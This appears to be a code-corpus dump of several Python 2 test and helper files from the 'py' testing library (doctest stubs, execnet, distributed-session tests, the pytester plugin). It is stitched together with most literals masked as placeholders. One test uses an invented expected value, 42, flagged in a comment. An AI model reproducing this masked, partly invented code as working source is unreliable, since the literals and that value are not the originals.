pop ( <NUM_LIT:0> ) <EOL> print line <EOL> return line + '<STR_LIT:\n>' <EOL> def test_Example ( ) : r"""<STR_LIT>""" <EOL> def test_DocTest ( ) : r"""<STR_LIT>""" <EOL> def test_DocTestFinder ( ) : r"""<STR_LIT>""" <EOL> def test_DocTestParser ( ) : r"""<STR_LIT>""" <EOL> class test_DocTestRunner : <EOL> def basics ( ) : r"""<STR_LIT>""" <EOL> def verbose_flag ( ) : r"""<STR_LIT>""" <EOL> def exceptions ( ) : r"""<STR_LIT>""" <EOL> def optionflags ( ) : r"""<STR_LIT>""" <EOL> def option_directives ( ) : r"""<STR_LIT>""" <EOL> def test_testsource ( ) : r"""<STR_LIT>""" <EOL> def test_debug ( ) : r"""<STR_LIT>""" <EOL> def test_pdb_set_trace ( ) : <EOL> """<STR_LIT>""" <EOL> def test_pdb_set_trace_nested ( ) : <EOL> """<STR_LIT>""" <EOL> def test_DocTestSuite ( ) : <EOL> """<STR_LIT>""" <EOL> def test_DocFileSuite ( ) : <EOL> """<STR_LIT>""" <EOL> def test_trailing_space_in_test ( ) : <EOL> """<STR_LIT>""" <EOL> def test_unittest_reportflags ( ) : <EOL> """<STR_LIT>""" <EOL> def test_testfile ( ) : r"""<STR_LIT>""" <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , "<STR_LIT>" , DeprecationWarning , <EOL> __name__ , <NUM_LIT:0> ) <EOL> def old_test1 ( ) : r"""<STR_LIT>""" <EOL> def old_test2 ( ) : r"""<STR_LIT>""" <EOL> def old_test3 ( ) : r"""<STR_LIT>""" <EOL> def old_test4 ( ) : """<STR_LIT>""" <EOL> def test_main ( ) : <EOL> test_support . run_doctest ( doctest , verbosity = True ) <EOL> from test import test_doctest <EOL> test_support . run_doctest ( test_doctest , verbosity = True ) <EOL> import trace , sys , re , StringIO <EOL> def test_coverage ( coverdir ) : <EOL> tracer = trace . Trace ( ignoredirs = [ sys . prefix , sys . exec_prefix , ] , <EOL> trace = <NUM_LIT:0> , count = <NUM_LIT:1> ) <EOL> tracer . run ( '<STR_LIT>' ) <EOL> r = tracer . results ( ) <EOL> print '<STR_LIT>' <EOL> r . write_results ( show_missing = True , summary = True , <EOL> coverdir = coverdir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if '<STR_LIT:-c>' in sys . 
argv : <EOL> test_coverage ( '<STR_LIT>' ) <EOL> else : <EOL> test_main ( ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> class TestMultiChannelAndGateway : <EOL> def test_multichannel_receive_each ( self ) : <EOL> class pseudochannel : <EOL> def receive ( self ) : <EOL> return <NUM_LIT:12> <EOL> pc1 = pseudochannel ( ) <EOL> pc2 = pseudochannel ( ) <EOL> multichannel = py . execnet . MultiChannel ( [ pc1 , pc2 ] ) <EOL> l = multichannel . receive_each ( withchannel = True ) <EOL> assert len ( l ) == <NUM_LIT:2> <EOL> assert l == [ ( pc1 , <NUM_LIT:12> ) , ( pc2 , <NUM_LIT:12> ) ] <EOL> l = multichannel . receive_each ( withchannel = False ) <EOL> assert l == [ <NUM_LIT:12> , <NUM_LIT:12> ] <EOL> def test_multichannel_send_each ( self ) : <EOL> l = [ py . execnet . PopenGateway ( ) for x in range ( <NUM_LIT:2> ) ] <EOL> gm = py . execnet . MultiGateway ( l ) <EOL> mc = gm . remote_exec ( """<STR_LIT>""" ) <EOL> mc . send_each ( <NUM_LIT> ) <EOL> l = mc . receive_each ( ) <EOL> assert l == [ <NUM_LIT> , <NUM_LIT> ] <EOL> def test_multichannel_receive_queue_for_two_subprocesses ( self ) : <EOL> l = [ py . execnet . PopenGateway ( ) for x in range ( <NUM_LIT:2> ) ] <EOL> gm = py . execnet . MultiGateway ( l ) <EOL> mc = gm . remote_exec ( """<STR_LIT>""" ) <EOL> queue = mc . make_receive_queue ( ) <EOL> ch , item = queue . get ( timeout = <NUM_LIT:10> ) <EOL> ch2 , item2 = queue . get ( timeout = <NUM_LIT:10> ) <EOL> assert ch != ch2 <EOL> assert ch . gateway != ch2 . gateway <EOL> assert item != item2 <EOL> mc . waitclose ( ) <EOL> def test_multichannel_waitclose ( self ) : <EOL> l = [ ] <EOL> class pseudochannel : <EOL> def waitclose ( self ) : <EOL> l . append ( <NUM_LIT:0> ) <EOL> multichannel = py . execnet . MultiChannel ( [ pseudochannel ( ) , pseudochannel ( ) ] ) <EOL> multichannel . waitclose ( ) <EOL> assert len ( l ) == <NUM_LIT:2> </s>
# Registry of saved original attribute values, keyed by (namespace, name).
# Each key maps to a stack of originals so the same attribute can be
# patched several times and reverted in LIFO order.
patched = {}


def patch(namespace, name, value):
    """<STR_LIT>"""
    nref = (namespace, name)
    # Remember the current value so revert() can restore it later.
    orig = getattr(namespace, name)
    patched.setdefault(nref, []).append(orig)
    setattr(namespace, name, value)
    return orig


def revert(namespace, name):
    """<STR_LIT>"""
    nref = (namespace, name)
    if nref not in patched or not patched[nref]:
        # Call form of raise (valid on Python 2 and 3); the original used
        # the Python-2-only "raise E, msg" statement form.
        raise ValueError("<STR_LIT>" % nref)
    current = getattr(namespace, name)
    orig = patched[nref].pop()
    setattr(namespace, name, orig)
    return current
import os
import py
from py.__.misc.terminal_helper import get_terminal_width

def test_terminal_width():
    """<STR_LIT>"""
    assert get_terminal_width()
    try:
        import fcntl
    except ImportError:
        py.test.skip('<STR_LIT>')

    def failing_ioctl(*args):
        # Force the ioctl-based probe to fail so the environment-variable
        # fallback path inside get_terminal_width() is exercised.
        raise ValueError

    orig_ioctl = fcntl.ioctl
    fcntl.ioctl = failing_ioctl
    # Capture the prior value BEFORE mutating the environment.
    cols = os.environ.get('<STR_LIT>', None)
    try:
        os.environ['<STR_LIT>'] = '<STR_LIT>'
        # NOTE(review): the expected-width literal was masked in this
        # source snapshot; 42 is a placeholder — restore the original value.
        assert get_terminal_width() == 42
    finally:
        fcntl.ioctl = orig_ioctl
        # Restore the environment exactly: put back the old value (even an
        # empty string), or remove the variable entirely if it was unset.
        # The original code leaked the temporary value when the variable
        # had not been set before ("if cols:" skipped both cases).
        if cols is not None:
            os.environ['<STR_LIT>'] = cols
        else:
            del os.environ['<STR_LIT>']
import py
import os, sys

# Pick a platform-appropriate process-termination primitive at import time.
if sys.platform == "<STR_LIT:win32>":
    try:
        import ctypes
    except ImportError:
        def dokill(pid):
            # No ctypes available: shell out to an external command.
            py.process.cmdexec("<STR_LIT>" % (pid,))
    else:
        def dokill(pid):
            # Terminate via the win32 API.
            PROCESS_TERMINATE = 1
            handle = ctypes.windll.kernel32.OpenProcess(
                PROCESS_TERMINATE, False, pid)
            ctypes.windll.kernel32.TerminateProcess(handle, -1)
            ctypes.windll.kernel32.CloseHandle(handle)
else:
    def dokill(pid):
        # POSIX: signal 15 (SIGTERM).
        os.kill(pid, 15)


def kill(pid):
    """<STR_LIT>"""
    dokill(pid)
<s> from py . __ . test . dist . dsession import DSession <EOL> from py . __ . test import outcome <EOL> import py <EOL> XSpec = py . execnet . XSpec <EOL> def run ( item , node , excinfo = None ) : <EOL> runner = item . config . pluginmanager . getplugin ( "<STR_LIT>" ) <EOL> rep = runner . ItemTestReport ( item = item , <EOL> excinfo = excinfo , when = "<STR_LIT>" ) <EOL> rep . node = node <EOL> return rep <EOL> class MockNode : <EOL> def __init__ ( self ) : <EOL> self . sent = [ ] <EOL> def sendlist ( self , items ) : <EOL> self . sent . append ( items ) <EOL> def shutdown ( self ) : <EOL> self . _shutdown = True <EOL> def dumpqueue ( queue ) : <EOL> while queue . qsize ( ) : <EOL> print queue . get ( ) <EOL> class TestDSession : <EOL> def test_add_remove_node ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node = MockNode ( ) <EOL> rep = run ( item , node ) <EOL> session = DSession ( item . config ) <EOL> assert not session . node2pending <EOL> session . addnode ( node ) <EOL> assert len ( session . node2pending ) == <NUM_LIT:1> <EOL> session . senditems_load ( [ item ] ) <EOL> pending = session . removenode ( node ) <EOL> assert pending == [ item ] <EOL> assert item not in session . item2nodes <EOL> l = session . removenode ( node ) <EOL> assert not l <EOL> def test_senditems_each_and_receive_with_two_nodes ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node1 = MockNode ( ) <EOL> node2 = MockNode ( ) <EOL> session = DSession ( item . config ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_each ( [ item ] ) <EOL> assert session . node2pending [ node1 ] == [ item ] <EOL> assert session . node2pending [ node2 ] == [ item ] <EOL> assert node1 in session . item2nodes [ item ] <EOL> assert node2 in session . item2nodes [ item ] <EOL> session . removeitem ( item , node1 ) <EOL> assert session . item2nodes [ item ] == [ node2 ] <EOL> session . 
removeitem ( item , node2 ) <EOL> assert not session . node2pending [ node1 ] <EOL> assert not session . item2nodes <EOL> def test_senditems_load_and_receive_one_node ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node = MockNode ( ) <EOL> rep = run ( item , node ) <EOL> session = DSession ( item . config ) <EOL> session . addnode ( node ) <EOL> session . senditems_load ( [ item ] ) <EOL> assert session . node2pending [ node ] == [ item ] <EOL> assert session . item2nodes [ item ] == [ node ] <EOL> session . removeitem ( item , node ) <EOL> assert not session . node2pending [ node ] <EOL> assert not session . item2nodes <EOL> def test_triggertesting_collect ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> session . triggertesting ( [ modcol ] ) <EOL> name , args , kwargs = session . queue . get ( block = False ) <EOL> assert name == '<STR_LIT>' <EOL> report = kwargs [ '<STR_LIT>' ] <EOL> assert len ( report . result ) == <NUM_LIT:1> <EOL> def test_triggertesting_item ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node1 = MockNode ( ) <EOL> node2 = MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . triggertesting ( [ item ] * ( session . MAXITEMSPERHOST * <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> sent1 = node1 . sent [ <NUM_LIT:0> ] <EOL> sent2 = node2 . sent [ <NUM_LIT:0> ] <EOL> assert sent1 == [ item ] * session . MAXITEMSPERHOST <EOL> assert sent2 == [ item ] * session . MAXITEMSPERHOST <EOL> assert session . node2pending [ node1 ] == sent1 <EOL> assert session . node2pending [ node2 ] == sent2 <EOL> name , args , kwargs = session . queue . get ( block = False ) <EOL> assert name == "<STR_LIT>" <EOL> assert kwargs [ '<STR_LIT>' ] == [ item ] <EOL> def test_keyboardinterrupt ( self , testdir ) : <EOL> item = testdir . 
getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> def raise_ ( timeout = None ) : raise KeyboardInterrupt ( ) <EOL> session . queue . get = raise_ <EOL> exitstatus = session . loop ( [ ] ) <EOL> assert exitstatus == outcome . EXIT_INTERRUPTED <EOL> def test_internalerror ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> def raise_ ( ) : raise ValueError ( ) <EOL> session . queue . get = raise_ <EOL> exitstatus = session . loop ( [ ] ) <EOL> assert exitstatus == outcome . EXIT_INTERNALERROR <EOL> def test_rescheduleevent ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . queueevent ( "<STR_LIT>" , items = [ item ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . dowork == False <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . sent == [ [ item ] ] <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . shuttingdown <EOL> assert not loopstate . testsfailed <EOL> def test_no_node_remaining_for_tests ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> loopstate . dowork = False <EOL> session . loop_once ( loopstate ) <EOL> dumpqueue ( session . queue ) <EOL> assert loopstate . exitstatus == outcome . EXIT_NOHOSTS <EOL> def test_removeitem_from_failing_teardown ( self , testdir ) : <EOL> modcol = testdir . 
getmodulecol ( """<STR_LIT>""" ) <EOL> item1 , = modcol . collect ( ) <EOL> session = DSession ( item1 . config ) <EOL> node1 , node2 = MockNode ( ) , MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_each ( [ item1 ] ) <EOL> nodes = session . item2nodes [ item1 ] <EOL> class rep : <EOL> failed = True <EOL> item = item1 <EOL> node = nodes [ <NUM_LIT:0> ] <EOL> when = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , report = rep ) <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> print session . item2nodes <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:2> <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:1> <EOL> rep . when = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , report = rep ) <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:1> <EOL> def test_testnodedown_causes_reschedule_pending ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> item1 , item2 = modcol . collect ( ) <EOL> session = DSession ( item1 . config ) <EOL> node1 , node2 = MockNode ( ) , MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_load ( [ item1 , item2 ] ) <EOL> node = session . item2nodes [ item1 ] [ <NUM_LIT:0> ] <EOL> item1 . config . option . dist = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = "<STR_LIT>" ) <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> print session . item2nodes <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . colitems == [ item2 ] <EOL> rep = reprec . matchreport ( names = "<STR_LIT>" ) <EOL> assert rep . failed <EOL> assert rep . item == item1 <EOL> assert str ( rep . longrepr ) . 
find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> def test_testnodeready_adds_to_available ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node1 = MockNode ( ) <EOL> session . queueevent ( "<STR_LIT>" , node = node1 ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> loopstate . dowork = False <EOL> assert len ( session . node2pending ) == <NUM_LIT:0> <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . node2pending ) == <NUM_LIT:1> <EOL> def runthrough ( self , item , excinfo = None ) : <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . sent == [ [ item ] ] <EOL> ev = run ( item , node , excinfo = excinfo ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . shuttingdown <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> dumpqueue ( session . queue ) <EOL> return session , loopstate . exitstatus <EOL> def test_exit_completed_tests_ok ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session , exitstatus = self . runthrough ( item ) <EOL> assert exitstatus == outcome . EXIT_OK <EOL> def test_exit_completed_tests_fail ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session , exitstatus = self . runthrough ( item , excinfo = "<STR_LIT>" ) <EOL> assert exitstatus == outcome . EXIT_TESTSFAILED <EOL> def test_exit_on_first_failing ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> modcol . config . option . exitfirst = True <EOL> session = DSession ( modcol . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> items = modcol . config . hook . 
pytest_make_collect_report ( collector = modcol ) . result <EOL> session . triggertesting ( items ) <EOL> ev1 = run ( items [ <NUM_LIT:0> ] , node , "<STR_LIT>" ) <EOL> ev2 = run ( items [ <NUM_LIT:1> ] , node , None ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev1 ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev2 ) <EOL> loopstate = session . _initloopstate ( items ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . testsfailed <EOL> assert loopstate . shuttingdown <EOL> def test_shuttingdown_filters ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> loopstate . shuttingdown = True <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> session . loop_once ( loopstate ) <EOL> assert not reprec . getcalls ( "<STR_LIT>" ) <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> assert reprec . getcall ( '<STR_LIT>' ) . node == node <EOL> def test_filteritems ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> modcol . config . option . keyword = "<STR_LIT>" <EOL> dsel = session . filteritems ( [ modcol ] ) <EOL> assert dsel == [ modcol ] <EOL> items = modcol . collect ( ) <EOL> hookrecorder = testdir . getreportrecorder ( session ) . hookrecorder <EOL> remaining = session . filteritems ( items ) <EOL> assert remaining == [ ] <EOL> event = hookrecorder . getcalls ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> assert event . items == items <EOL> modcol . config . option . keyword = "<STR_LIT>" <EOL> remaining = session . filteritems ( items ) <EOL> assert remaining == [ items [ <NUM_LIT:0> ] ] <EOL> event = hookrecorder . 
getcalls ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> assert event . items == [ items [ <NUM_LIT:1> ] ] <EOL> def test_testnodedown_shutdown_after_completion ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> session . senditems_load ( [ item ] ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . _shutdown is True <EOL> assert loopstate . exitstatus is None , "<STR_LIT>" <EOL> assert loopstate . shuttingdown <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . exitstatus == <NUM_LIT:0> <EOL> def test_nopending_but_collection_remains ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> colreport = modcol . config . hook . pytest_make_collect_report ( collector = modcol ) <EOL> item1 , item2 = colreport . result <EOL> session . senditems_load ( [ item1 ] ) <EOL> rep = run ( item1 , node ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item1 , node ) ) <EOL> session . queueevent ( "<STR_LIT>" , report = colreport ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . exitstatus is None , "<STR_LIT>" <EOL> assert not loopstate . colitems <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . colitems == colreport . result <EOL> assert loopstate . exitstatus is None , "<STR_LIT>" <EOL> def test_dist_some_tests ( self , testdir ) : <EOL> p1 = testdir . makepyfile ( test_one = """<STR_LIT>""" ) <EOL> config = testdir . 
parseconfig ( '<STR_LIT>' , p1 , '<STR_LIT>' ) <EOL> dsession = DSession ( config ) <EOL> hookrecorder = testdir . getreportrecorder ( config ) . hookrecorder <EOL> dsession . main ( [ config . getfsnode ( p1 ) ] ) <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . passed <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . skipped <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . failed <EOL> node = hookrecorder . popcall ( "<STR_LIT>" ) . node <EOL> assert node . gateway . spec . popen <EOL> def test_collected_function_causes_remote_skip ( testdir ) : <EOL> sub = testdir . mkpydir ( "<STR_LIT>" ) <EOL> sub . join ( "<STR_LIT>" ) . write ( py . code . Source ( """<STR_LIT>""" % str ( sub . ensure ( "<STR_LIT>" ) ) ) ) <EOL> result = testdir . runpytest ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_teardownfails_one_function ( testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> import sys , os <EOL> import inspect <EOL> from py . __ . test . config import Config as pytestConfig <EOL> import hookspec <EOL> import subprocess <EOL> pytest_plugins = '<STR_LIT>' <EOL> def pytest_funcarg__linecomp ( request ) : <EOL> return LineComp ( ) <EOL> def pytest_funcarg__LineMatcher ( request ) : <EOL> return LineMatcher <EOL> def pytest_funcarg__testdir ( request ) : <EOL> tmptestdir = TmpTestdir ( request ) <EOL> return tmptestdir <EOL> def pytest_funcarg__reportrecorder ( request ) : <EOL> reprec = ReportRecorder ( py . _com . comregistry ) <EOL> request . addfinalizer ( lambda : reprec . comregistry . unregister ( reprec ) ) <EOL> return reprec <EOL> class RunResult : <EOL> def __init__ ( self , ret , outlines , errlines ) : <EOL> self . ret = ret <EOL> self . outlines = outlines <EOL> self . errlines = errlines <EOL> self . stdout = LineMatcher ( outlines ) <EOL> self . stderr = LineMatcher ( errlines ) <EOL> class TmpTestdir : <EOL> def __init__ ( self , request ) : <EOL> self . request = request <EOL> self . _pytest = request . getfuncargvalue ( "<STR_LIT>" ) <EOL> basetmp = request . config . ensuretemp ( "<STR_LIT>" ) <EOL> name = request . function . __name__ <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> try : <EOL> tmpdir = basetmp . mkdir ( name + str ( i ) ) <EOL> except py . error . EEXIST : <EOL> continue <EOL> break <EOL> self . tmpdir = tmpdir . mkdir ( name ) <EOL> self . plugins = [ ] <EOL> self . _syspathremove = [ ] <EOL> self . chdir ( ) <EOL> assert hasattr ( self , '<STR_LIT>' ) <EOL> self . request . addfinalizer ( self . finalize ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . tmpdir , ) <EOL> def Config ( self , comregistry = None , topdir = None ) : <EOL> if topdir is None : <EOL> topdir = self . tmpdir . dirpath ( ) <EOL> return pytestConfig ( comregistry , topdir = topdir ) <EOL> def finalize ( self ) : <EOL> for p in self . _syspathremove : <EOL> py . std . 
sys . path . remove ( p ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . _olddir . chdir ( ) <EOL> def getreportrecorder ( self , obj ) : <EOL> if isinstance ( obj , py . _com . Registry ) : <EOL> registry = obj <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . comregistry <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . pluginmanager . comregistry <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . config . pluginmanager . comregistry <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( obj , ) ) <EOL> assert isinstance ( registry , py . _com . Registry ) <EOL> reprec = ReportRecorder ( registry ) <EOL> reprec . hookrecorder = self . _pytest . gethookrecorder ( hookspec , registry ) <EOL> reprec . hook = reprec . hookrecorder . hook <EOL> return reprec <EOL> def chdir ( self ) : <EOL> old = self . tmpdir . chdir ( ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _olddir = old <EOL> def _makefile ( self , ext , args , kwargs ) : <EOL> items = kwargs . items ( ) <EOL> if args : <EOL> source = "<STR_LIT:\n>" . join ( map ( str , args ) ) <EOL> basename = self . request . function . __name__ <EOL> items . insert ( <NUM_LIT:0> , ( basename , source ) ) <EOL> ret = None <EOL> for name , value in items : <EOL> p = self . tmpdir . join ( name ) . new ( ext = ext ) <EOL> source = py . code . Source ( value ) <EOL> p . write ( str ( py . code . Source ( value ) ) . lstrip ( ) ) <EOL> if ret is None : <EOL> ret = p <EOL> return ret <EOL> def makefile ( self , ext , * args , ** kwargs ) : <EOL> return self . _makefile ( ext , args , kwargs ) <EOL> def makeconftest ( self , source ) : <EOL> return self . makepyfile ( conftest = source ) <EOL> def makepyfile ( self , * args , ** kwargs ) : <EOL> return self . _makefile ( '<STR_LIT>' , args , kwargs ) <EOL> def maketxtfile ( self , * args , ** kwargs ) : <EOL> return self . 
_makefile ( '<STR_LIT>' , args , kwargs ) <EOL> def syspathinsert ( self , path = None ) : <EOL> if path is None : <EOL> path = self . tmpdir <EOL> py . std . sys . path . insert ( <NUM_LIT:0> , str ( path ) ) <EOL> self . _syspathremove . append ( str ( path ) ) <EOL> def mkdir ( self , name ) : <EOL> return self . tmpdir . mkdir ( name ) <EOL> def mkpydir ( self , name ) : <EOL> p = self . mkdir ( name ) <EOL> p . ensure ( "<STR_LIT>" ) <EOL> return p <EOL> def genitems ( self , colitems ) : <EOL> return list ( self . session . genitems ( colitems ) ) <EOL> def inline_genitems ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> session = config . initsession ( ) <EOL> rec = self . getreportrecorder ( config ) <EOL> colitems = [ config . getfsnode ( arg ) for arg in config . args ] <EOL> items = list ( session . genitems ( colitems ) ) <EOL> return items , rec <EOL> def runitem ( self , source ) : <EOL> item = self . getitem ( source ) <EOL> testclassinstance = self . request . function . im_self <EOL> runner = testclassinstance . getrunner ( ) <EOL> return runner ( item ) <EOL> def inline_runsource ( self , source , * cmdlineargs ) : <EOL> p = self . makepyfile ( source ) <EOL> l = list ( cmdlineargs ) + [ p ] <EOL> return self . inline_run ( * l ) <EOL> def inline_runsource1 ( self , * args ) : <EOL> args = list ( args ) <EOL> source = args . pop ( ) <EOL> p = self . makepyfile ( source ) <EOL> l = list ( args ) + [ p ] <EOL> reprec = self . inline_run ( * l ) <EOL> reports = reprec . getreports ( "<STR_LIT>" ) <EOL> assert len ( reports ) == <NUM_LIT:1> , reports <EOL> return reports [ <NUM_LIT:0> ] <EOL> def inline_run ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> config . pluginmanager . do_configure ( config ) <EOL> session = config . initsession ( ) <EOL> reprec = self . getreportrecorder ( config ) <EOL> session . main ( ) <EOL> config . pluginmanager . 
do_unconfigure ( config ) <EOL> return reprec <EOL> def config_preparse ( self ) : <EOL> config = self . Config ( ) <EOL> for plugin in self . plugins : <EOL> if isinstance ( plugin , str ) : <EOL> config . pluginmanager . import_plugin ( plugin ) <EOL> else : <EOL> if isinstance ( plugin , dict ) : <EOL> plugin = PseudoPlugin ( plugin ) <EOL> if not config . pluginmanager . isregistered ( plugin ) : <EOL> config . pluginmanager . register ( plugin ) <EOL> return config <EOL> def parseconfig ( self , * args ) : <EOL> if not args : <EOL> args = ( self . tmpdir , ) <EOL> config = self . config_preparse ( ) <EOL> args = list ( args ) + [ "<STR_LIT>" % self . tmpdir . dirpath ( '<STR_LIT>' ) ] <EOL> config . parse ( args ) <EOL> return config <EOL> def parseconfigure ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> config . pluginmanager . do_configure ( config ) <EOL> return config <EOL> def getitem ( self , source , funcname = "<STR_LIT>" ) : <EOL> modcol = self . getmodulecol ( source ) <EOL> moditems = modcol . collect ( ) <EOL> for item in modcol . collect ( ) : <EOL> if item . name == funcname : <EOL> return item <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" % ( funcname , source ) <EOL> def getitems ( self , source ) : <EOL> modcol = self . getmodulecol ( source ) <EOL> return list ( modcol . config . initsession ( ) . genitems ( [ modcol ] ) ) <EOL> def getfscol ( self , path , configargs = ( ) ) : <EOL> self . config = self . parseconfig ( path , * configargs ) <EOL> self . session = self . config . initsession ( ) <EOL> return self . config . getfsnode ( path ) <EOL> def getmodulecol ( self , source , configargs = ( ) , withinit = False ) : <EOL> kw = { self . request . function . __name__ : py . code . Source ( source ) . strip ( ) } <EOL> path = self . makepyfile ( ** kw ) <EOL> if withinit : <EOL> self . makepyfile ( __init__ = "<STR_LIT:#>" ) <EOL> self . config = self . parseconfig ( path , * configargs ) <EOL> self . 
